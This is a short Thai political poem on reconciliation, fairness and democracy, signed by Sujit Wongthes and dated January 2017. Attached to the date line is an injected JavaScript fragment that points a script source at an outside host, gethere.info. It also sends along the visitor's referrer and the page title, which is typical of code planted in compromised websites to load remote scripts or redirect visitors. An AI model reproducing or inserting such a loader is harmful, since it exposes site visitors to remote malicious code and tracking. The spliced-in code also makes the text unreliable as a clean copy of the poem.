ปรองดอง

 

ความเป็นธรรมความเสมอภาค

มีเมื่อไรไม่ยากปรองดองได้

ถ้าต่อต้านประชาธิปไตย

ปรองดองไร้อะไรอะไรก็ไม่มี

 

สุจิตต์ วงษ์เทศ

พุธ 18 มกราคม 2560s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;